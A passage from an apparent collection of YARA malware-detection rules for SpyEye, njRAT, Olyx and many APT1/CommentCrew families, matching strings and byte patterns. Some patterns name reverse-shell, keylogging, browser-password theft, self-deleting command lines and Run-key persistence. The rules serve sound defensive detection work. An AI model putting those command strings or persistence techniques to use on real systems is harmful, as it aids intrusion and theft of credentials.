   		$k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!"   
   		$l = "[ERROR] : Update is not successfull for some reason"   
   		$m = "[ERROR] : dwErr == %u"   
   		$n = "GRABBED DATA"   
   		   
   	condition:   
   		$spyeye or (any of ($a,$b,$c,$d,$e,$f,$g,$h,$i,$j,$k,$l,$m,$n))   
// https://otx.alienvault.com/pulse/58a3af44ac64af2dd71c3985
rule OlyxStrings : Olyx Family   
   {   
       meta:   
           description = "Olyx Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-19"   
              
       strings:   
           $ = "/Applications/Automator.app/Contents/MacOS/DockLight"   
             
       condition:   
           any of them   
rule OlyxCode : Olyx Family    
   {   
       meta:   
           description = "Olyx code tricks"   
           author = "Seth Hardy"   
           last_modified = "2014-06-19"   
              
       strings:   
           $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }   
           $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }   
              
       condition:   
           any of them   
rule PubSabStrings : PubSab Family   
   {   
       meta:   
           description = "PubSab Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-19"   
              
       strings:   
           $ = "_deamon_init"   
           $ = "com.apple.PubSabAgent"   
           $ = "/tmp/screen.jpeg"   
             
       condition:   
           any of them   
rule PubSabCode : PubSab Family    
   {   
       meta:   
           description = "PubSab code tricks"   
           author = "Seth Hardy"   
           last_modified = "2014-06-19"   
              
       strings:   
           $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }   
              
       condition:   
           any of them   
rule RookieStrings : Rookie Family   
   {   
       meta:   
           description = "Rookie Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-25"   
              
       strings:   
           $ = "RookIE/1.0"   
              
       condition:   
          any of them   
rule RookieCode : Rookie Family    
   {   
       meta:   
           description = "Rookie code features"   
           author = "Seth Hardy"   
           last_modified = "2014-06-25"   
              
       strings:   
           // hidden AutoConfigURL   
           $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }   
           // hidden ProxyEnable   
           $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }   
           // xor on rand value?   
           $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }   
      
       condition:   
           any of them   
rule RooterCode : Rooter Family    
   {   
       meta:   
           description = "Rooter code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-10"   
          
       strings:   
           // xor 0x30 decryption   
           $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }   
          
       condition:   
           any of them   
rule SafeNetCode : SafeNet Family    
   {   
       meta:   
           description = "SafeNet code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-16"   
              
       strings:   
           // add edi, 14h; cmp edi, 50D0F8h   
           $ = { 83 C7 14 81 FF F8 D0 40 00 }   
       condition:   
           any of them   
rule SafeNetStrings : SafeNet Family   
   {   
       meta:   
           description = "Strings used by SafeNet"   
           author = "Seth Hardy"   
           last_modified = "2014-07-16"   
              
       strings:   
           $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"   
           $ = "/safe/record.php"   
           $ = "_Rm.bat" wide ascii   
           $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii   
           $ = "Ext.org" wide ascii   
              
       condition:   
           any of them   
      
rule ScarhiknStrings : Scarhikn Family   
   {   
       meta:   
           description = "Scarhikn Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-25"   
              
       strings:   
           $ = "9887___skej3sd"   
           $ = "haha123"   
              
       condition:   
          any of them   
rule ScarhiknCode : Scarhikn Family    
   {   
       meta:   
           description = "Scarhikn code features"   
           author = "Seth Hardy"   
           last_modified = "2014-06-25"   
          
       strings:   
           // decryption   
           $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }   
           $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }   
          
       condition:   
           any of them   
rule WimmieShellcode : Wimmie Family    
   {   
       meta:   
           description = "Wimmie code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-17"   
              
       strings:   
           // decryption loop   
           $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }   
           $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }   
              
       condition:   
           any of them   
// https://otx.alienvault.com/pulse/5810d51fbe8776217ed00f4a
rule network_traffic_njRAT    
   {   
   meta:   
   author = "info@fidelissecurity.com"   
   descripion = "njRAT - Remote Access Trojan"   
   comment = "Rule to alert on network traffic indicators"   
   filetype = "PCAP - Network Traffic"   
   date = "2013-07-15"   
   version = "1.0"   
   hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"   
   hash2 ="3576d40ce18bb0349f9dfa42b8911c3a"   
   hash3 ="24cc5b811a7f9591e7f2cb9a818be104"   
   hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"   
   hash5 = "a98b4c99f64315aac9dd992593830f35"   
   hash6 = "5fcb5282da1a2a0f053051c8da1686ef"   
   hash7 = "a669c0da6309a930af16381b18ba2f9d"   
   hash8 = "79dce17498e1997264346b162b09bde8"   
   hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"   
   ref1 = "http://bit.ly/19tlf4s"   
   ref2 = "http://www.fidelissecurity.com/threatadvisory"   
   ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html"   
   ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"   
      
   strings:   
   $string1 = "FM|'|'|"     // File Manager   
   $string2 = "nd|'|'|"     // File Manager   
   $string3 = "rn|'|'|"      // Run File   
   $string4 = "sc~|'|'|"     // Remote Desktop   
   $string5 = "scPK|'|'|"     // Remote Desktop   
   $string6 = "CAM|'|'|"     // Remote Cam   
   $string7 = "USB Video Device[endof]" // Remote Cam   
   $string8 = "rs|'|'|"     // Reverse Shell   
   $string9 = "proc|'|'|"     // Process Manager   
   $string10 = "k|'|'|"     // Process Manager   
   $string11 = "RG|'|'|~|'|'|"    // Registry Manipulation   
   $string12 = "kl|'|'|"     // Keylogger file   
   $string13 = "ret|'|'|"     // Get Browser Passwords   
   $string14 = "pl|'|'|"     // Get Browser Passwords   
   $string15 = "lv|'|'|"     // General   
   $string16 = "prof|'|'|~|'|'|"   // Server rename   
   $string17 = "un|'|'|~[endof]"   // Uninstall   
   $idle_string = "P[endof]"    // Idle Connection   
      
   condition:   
   any of ($string*) or #idle_string > 4     
      
rule njrat1: RAT   
   {   
       meta:   
           author = "Brian Wallace @botnet_hunter"   
           author_email = "bwall@ballastsecurity.net"   
           date = "2015-05-27"   
           description = "Identify njRat"   
       strings:   
           $a1 = "netsh firewall add allowedprogram " wide   
           $a2 = "SEE_MASK_NOZONECHECKS" wide   
      
           $b1 = "[TAP]" wide   
           $b2 = " & exit" wide   
      
           $c1 = "md.exe /k ping 0 & del " wide   
           $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide   
           $c3 = "cmd.exe /c ping" wide   
       condition:   
           1 of ($a*) and 1 of ($b*) and 1 of ($c*)   
// https://otx.alienvault.com/pulse/5975eded481b4c7c5af5f810
// https://otx.alienvault.com/pulse/58ab817bac3cdc0d5b2c7b4d
rule BANGAT_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "superhard corp." wide ascii   
           $s2 = "microsoft corp." wide ascii   
           $s3 = "[Insert]" wide ascii   
           $s4 = "[Delete]" wide ascii   
           $s5 = "[End]" wide ascii   
           $s6 = "!(*@)(!@KEY" wide ascii   
           $s7 = "!(*@)(!@SID=" wide ascii   
           $s8 = "end      binary output" wide ascii   
           $s9 = "XriteProcessMemory" wide ascii   
           $s10 = "IE:Password-Protected sites" wide ascii   
           $s11 = "pstorec.dll" wide ascii   
      
       condition:   
           all of them   
rule APT1_TARSIP_ECLIPSE   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "\\pipe\\ssnp" wide ascii   
           $2 = "toobu.ini" wide ascii   
           $3 = "Serverfile is not bigger than Clientfile" wide ascii   
           $4 = "URL download success" wide ascii   
      
       condition:   
           3 of them   
rule AURIGA_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "superhard corp." wide ascii   
           $s2 = "microsoft corp." wide ascii   
           $s3 = "[Insert]" wide ascii   
           $s4 = "[Delete]" wide ascii   
           $s5 = "[End]" wide ascii   
           $s6 = "!(*@)(!@KEY" wide ascii   
           $s7 = "!(*@)(!@SID=" wide ascii   
      
       condition:   
           all of them   
rule HACKSFASE1_APT1   
   {   
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = {cb 39 82 49 42 be 1f 3a}   
      
       condition:   
           all of them   
rule APT1_WEBC2_HEAD   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "Ready!" wide ascii   
           $2 = "connect ok" wide ascii   
           $3 = "WinHTTP 1.0" wide ascii   
           $4 = "<head>" wide ascii   
      
       condition:   
           all of them   
rule CALENDAR_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
             
       strings:   
           $s1 = "content" wide ascii   
           $s2 = "title" wide ascii   
           $s3 = "entry" wide ascii   
           $s4 = "feed" wide ascii   
           $s5 = "DownRun success" wide ascii   
           $s6 = "%s@gmail.com" wide ascii   
           $s7 = "<!--%s-->" wide ascii   
           $b8 = "W4qKihsb+So=" wide ascii   
           $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii   
           $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii   
      
       condition:   
           all of ($s*) or all of ($b*)   
rule APT1_WEBC2_Y21K   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "Y29ubmVjdA" wide ascii // connect   
           $2 = "c2xlZXA" wide ascii // sleep   
           $3 = "cXVpdA" wide ascii // quit   
           $4 = "Y21k" wide ascii // cmd   
           $5 = "dW5zdXBwb3J0" wide ascii // unsupport   
      
       condition:   
           4 of them   
rule APT1_WEBC2_CSON   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $httpa1 = "/Default.aspx?INDEX=" wide ascii   
           $httpa2 = "/Default.aspx?ID=" wide ascii   
           $httpb1 = "Win32" wide ascii   
           $httpb2 = "Accept: text*/*" wide ascii   
           $exe1 = "xcmd.exe" wide ascii   
           $exe2 = "Google.exe" wide ascii   
      
       condition:   
           1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)   
rule APT1_WEBC2_TOCK   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "InprocServer32" wide ascii   
           $2 = "HKEY_PERFORMANCE_DATA" wide ascii   
           $3 = "<!---[<if IE 5>]id=" wide ascii   
      
       condition:   
           all of them   
rule ccrewDownloader2   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "3gZFQOBtY3sifNOl" wide ascii   
           $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii   
           $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii   
      
       condition:   
           any of them   
rule ccrewSSLBack2   
   {   
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = {39 82 49 42 BE 1F 3A}   
      
       condition:   
           any of them   
rule GLOOXMAIL_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Kill process success!" wide ascii   
           $s2 = "Kill process failed!" wide ascii   
           $s3 = "Sleep success!" wide ascii   
           $s4 = "based on gloox" wide ascii   
           $pdb = "glooxtest.pdb" wide ascii   
      
       condition:   
           all of ($s*) or $pdb   
rule HACKSFASE2_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Send to Server failed." wide ascii   
           $s2 = "HandShake with the server failed. Error:" wide ascii   
           $s3 = "Decryption Failed. Context Expired." wide ascii   
      
       condition:   
           all of them   
rule MANITSME_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Install an Service hosted by SVCHOST." wide ascii   
           $s2 = "The Dll file that to be released." wide ascii   
           $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii   
           $s4 = "svchost.exe" wide ascii   
           $e1 = "Man,it's me" wide ascii   
           $e2 = "Oh,shit" wide ascii   
           $e3 = "Hallelujah" wide ascii   
           $e4 = "nRet == SOCKET_ERROR" wide ascii   
           $pdb1 = "rouji\\release\\Install.pdb" wide ascii   
           $pdb2 = "rouji\\SvcMain.pdb" wide ascii   
      
       condition:   
           (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2   
rule AURIGA_driver_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Services\\riodrv32" wide ascii   
           $s2 = "riodrv32.sys" wide ascii   
           $s3 = "svchost.exe" wide ascii   
           $s4 = "wuauserv.dll" wide ascii   
           $s5 = "arp.exe" wide ascii   
           $pdb = "projects\\auriga" wide ascii   
      
       condition:   
           all of ($s*) or $pdb   
rule ccrewMiniasp   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
      
     strings:   
           $a = "MiniAsp.pdb" wide ascii   
           $b = "device_t=" wide ascii   
      
     condition:   
           any of them   
rule BOUNCER_DLL_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "new_connection_to_bounce():" wide ascii   
           $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii   
      
       condition:   
           all of them   
rule APT1_WEBC2_UGX   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii   
           $exe = "DefWatch.exe" wide ascii   
           $html = "index1.html" wide ascii   
           $cmd1 = "!@#tiuq#@!" wide ascii   
           $cmd2 = "!@#dmc#@!" wide ascii   
           $cmd3 = "!@#troppusnu#@!" wide ascii   
      
       condition:   
           3 of them   
rule APT1_WEBC2_TABLE   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $msg1 = "Fail To Execute The Command" wide ascii   
           $msg2 = "Execute The Command Successfully" wide ascii   
           /*   
       	$gif1 = /\w+\.gif/   
       	*/   
           $gif2 = "GIF89" wide ascii   
      
       condition:   
           3 of them   
rule ccrewQAZ   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "!QAZ@WSX" wide ascii   
      
     condition:   
           $a   
rule MoonProject   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
             
       strings:   
           $a = "Serverfile is smaller than Clientfile" wide ascii   
           $b = "\\M tools\\" wide ascii   
           $c = "MoonDLL" wide ascii   
           $d = "\\M tools\\" wide ascii   
      
     condition:   
           any of them   
rule APT1_Revird_svc   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $dll1 = "nwwwks.dll" wide ascii   
           $dll2 = "rdisk.dll" wide ascii   
           $dll3 = "skeys.dll" wide ascii   
           $dll4 = "SvcHost.DLL.log" wide ascii   
           $svc1 = "InstallService" wide ascii   
           $svc2 = "RundllInstallA" wide ascii   
           $svc3 = "RundllUninstallA" wide ascii   
           $svc4 = "ServiceMain" wide ascii   
           $svc5 = "UninstallService" wide ascii   
      
       condition:   
           1 of ($dll*) and 2 of ($svc*)   
rule BISCUIT_GREENCAT_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "zxdosml" wide ascii   
           $s2 = "get user name error!" wide ascii   
           $s3 = "get computer name error!" wide ascii   
           $s4 = "----client system info----" wide ascii   
           $s5 = "stfile" wide ascii   
           $s6 = "cmd success!" wide ascii   
      
       condition:   
           all of them   
rule APT1_WEBC2_GREENCAT   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "reader_sl.exe" wide ascii   
           $2 = "MS80547.bat" wide ascii   
           $3 = "ADR32" wide ascii   
           $4 = "ControlService failed!" wide ascii   
      
       condition:   
           3 of them   
rule APT1_WEBC2_DIV   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii   
           $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii   
           $3 = "Hello from MFC!" wide ascii   
           $4 = "Microsoft Internet Explorer" wide ascii   
      
       condition:   
           3 of them   
rule LIGHTDART_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "ret.log" wide ascii   
           $s2 = "Microsoft Internet Explorer 6.0" wide ascii   
           $s3 = "szURL Fail" wide ascii   
           $s4 = "szURL Successfully" wide ascii   
           $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii   
      
       condition:   
           all of them   
rule SWORD_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
             
       strings:   
           $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii   
           $s2 = "sleep:" wide ascii   
           $s3 = "down:" wide ascii   
           $s4 = "*========== Bye Bye ! ==========*" wide ascii   
      
       condition:   
           all of them   
rule ccrewDownloader3   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "ejlcmbv" wide ascii   
           $b = "bhxjuisv" wide ascii   
           $c = "yqzgrh" wide ascii   
           $d = "uqusofrp" wide ascii   
           $e = "Ljpltmivvdcbb" wide ascii   
           $f = "frfogjviirr" wide ascii   
           $g = "ximhttoskop" wide ascii   
      
       condition:   
           4 of them   
rule GEN_CCREW1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "W!r@o#n$g" wide ascii   
           $b = "KerNel32.dll" wide ascii   
      
       condition:   
           any of them   
rule KURTON_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii   
           $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii   
           $s3 = "MyTmpFile.Dat" wide ascii   
           $s4 = "SvcHost.DLL.log" wide ascii   
      
       condition:   
           all of them   
rule COMBOS_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii   
           $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii   
           $s3 = "Delay" wide ascii   
           $s4 = "Getfile" wide ascii   
           $s5 = "Putfile" wide ascii   
           $s6 = "---[ Virtual Shell]---" wide ascii   
           $s7 = "Not Comming From Our Server %s." wide ascii   
      
       condition:   
           all of them   
rule APT1_aspnetreport   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $url = "aspnet_client/report.asp" wide ascii   
           $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii   
           $pay1 = "rusinfo.exe" wide ascii   
           $pay2 = "cmd.exe" wide ascii   
           $pay3 = "AdobeUpdater.exe" wide ascii   
           $pay4 = "buildout.exe" wide ascii   
           $pay5 = "DefWatch.exe" wide ascii   
           $pay6 = "d.exe" wide ascii   
           $pay7 = "em.exe" wide ascii   
           $pay8 = "IMSCMig.exe" wide ascii   
           $pay9 = "localfile.exe" wide ascii   
           $pay10 = "md.exe" wide ascii   
           $pay11 = "mdm.exe" wide ascii   
           $pay12 = "mimikatz.exe" wide ascii   
           $pay13 = "msdev.exe" wide ascii   
           $pay14 = "ntoskrnl.exe" wide ascii   
           $pay15 = "p.exe" wide ascii   
           $pay16 = "otepad.exe" wide ascii   
           $pay17 = "reg.exe" wide ascii   
           $pay18 = "regsvr.exe" wide ascii   
           $pay19 = "runinfo.exe" wide ascii   
           $pay20 = "AdobeUpdate.exe" wide ascii   
           $pay21 = "inetinfo.exe" wide ascii   
           $pay22 = "svehost.exe" wide ascii   
           $pay23 = "update.exe" wide ascii   
           $pay24 = "NTLMHash.exe" wide ascii   
           $pay25 = "wpnpinst.exe" wide ascii   
           $pay26 = "WSDbg.exe" wide ascii   
           $pay27 = "xcmd.exe" wide ascii   
           $pay28 = "adobeup.exe" wide ascii   
           $pay29 = "0830.bin" wide ascii   
           $pay30 = "1001.bin" wide ascii   
           $pay31 = "a.bin" wide ascii   
           $pay32 = "ISUN32.EXE" wide ascii   
           $pay33 = "AcroRD32.EXE" wide ascii   
           $pay34 = "INETINFO.EXE" wide ascii   
      
       condition:   
           $url and $param and 1 of ($pay*)   
rule LONGRUN_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii   
           $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii   
           $s3 = "wait:" wide ascii   
           $s4 = "Dcryption Error! Invalid Character" wide ascii   
      
       condition:   
           all of them   
rule TrojanCookies_CCREW   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
        strings:   
           $a = "sleep:" wide ascii   
           $b = "content=" wide ascii   
           $c = "reqpath=" wide ascii   
           $d = "savepath=" wide ascii   
           $e = "command=" wide ascii   
      
       condition:   
           4 of ($a,$b,$c,$d,$e)   
rule TABMSGSQL_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "letusgohtppmmv2.0.0.1" wide ascii   
           $s2 = "Mozilla/4.0 (compatible; )" wide ascii   
           $s3 = "filestoc" wide ascii   
           $s4 = "filectos" wide ascii   
           $s5 = "reshell" wide ascii   
      
       condition:   
           all of them   
rule APT1_WEBC2_RAVE   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "iniet.exe" wide ascii   
           $2 = "cmd.exe" wide ascii   
           $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii   
           $4 = "Device File System" wide ascii   
      
       condition:   
           3 of them   
rule MACROMAIL_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "svcMsn.dll" wide ascii   
           $s2 = "RundllInstall" wide ascii   
           $s3 = "Config service %s ok." wide ascii   
           $s4 = "svchost.exe" wide ascii   
      
       condition:   
           all of them   
rule APT1_WARP   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $err1 = "exception..." wide ascii   
           $err2 = "failed..." wide ascii   
           $err3 = "opened..." wide ascii   
           $exe1 = "cmd.exe" wide ascii   
           $exe2 = "ISUN32.EXE" wide ascii   
      
       condition:   
           2 of ($err*) and all of ($exe*)   
rule thequickbrow_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "thequickbrownfxjmpsvalzydg" wide ascii   
      
       condition:   
           all of them   
rule BOUNCER_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii   
           $s2 = "IDR_DATA%d" wide ascii   
           $s3 = "asdfqwe123cxz" wide ascii   
           $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii   
      
       condition:   
           ($s1 and $s2) or ($s3 and $s4)   
rule metaxcd   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "<meta xcd=" wide ascii   
      
       condition:   
           $a   
rule APT1_WEBC2_AUSOV   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "ntshrui.dll" wide ascii   
           $2 = "%SystemRoot%\\System32\\" wide ascii   
           $3 = "<!--DOCHTML" wide ascii   
           $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii   
           $5 = "Ausov" wide ascii   
      
       condition:   
           4 of them   
rule CCREWBACK1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "postvalue" wide ascii   
           $b = "postdata" wide ascii   
           $c = "postfile" wide ascii   
           $d = "hostname" wide ascii   
           $e = "clientkey" wide ascii   
           $f = "start Cmd Failure!" wide ascii   
           $g = "sleep:" wide ascii   
           $h = "downloadcopy:" wide ascii   
           $i = "download:" wide ascii   
           $j = "geturl:" wide ascii   
           $k = "1.234.1.68" wide ascii   
      
       condition:   
           4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k   
rule DAIRY_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii   
           $s2 = "KilFail" wide ascii   
           $s3 = "KilSucc" wide ascii   
           $s4 = "pkkill" wide ascii   
           $s5 = "pklist" wide ascii   
      
       condition:   
           all of them   
rule APT1_TARSIP_MOON   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii   
           $s2 = "URL download success!" wide ascii   
           $s3 = "Kugoosoft" wide ascii   
           $msg1 = "Modify file failed!! So strange!" wide ascii   
           $msg2 = "Create cmd process failed!" wide ascii   
           $msg3 = "The command has not been implemented!" wide ascii   
           $msg4 = "Runas success!" wide ascii   
           $onec1 = "onec.php" wide ascii   
           $onec2 = "/bin/onec" wide ascii   
      
       condition:   
           1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)   
rule APT1_RARSilent_EXE_PDF   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $winrar1 = "WINRAR.SFX" wide ascii   
           $str2 = "Steup=" wide ascii   
      
       condition:   
           all of them   
rule MINIASP_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "miniasp" wide ascii   
           $s2 = "wakeup=" wide ascii   
           $s3 = "download ok!" wide ascii   
           $s4 = "command is null!" wide ascii   
           $s5 = "device_input.asp?device_t=" wide ascii   
      
       condition:   
           all of them   
rule APT1_WEBC2_YAHOO   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $http1 = "HTTP/1.0" wide ascii   
           $http2 = "Content-Type:" wide ascii   
           $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii   
      
       condition:   
           all of them   
rule MiniASP   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }   
           $PDB = "MiniAsp.pdb" nocase wide ascii   
      
       condition:   
           any of them   
rule APT1_WEBC2_QBP   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "2010QBP" wide ascii   
           $2 = "adobe_sl.exe" wide ascii   
           $3 = "URLDownloadToCacheFile" wide ascii   
           $4 = "dnsapi.dll" wide ascii   
           $5 = "urlmon.dll" wide ascii   
      
       condition:   
           4 of them   
rule EclipseSunCloudRAT   
   {   
      
       meta:   
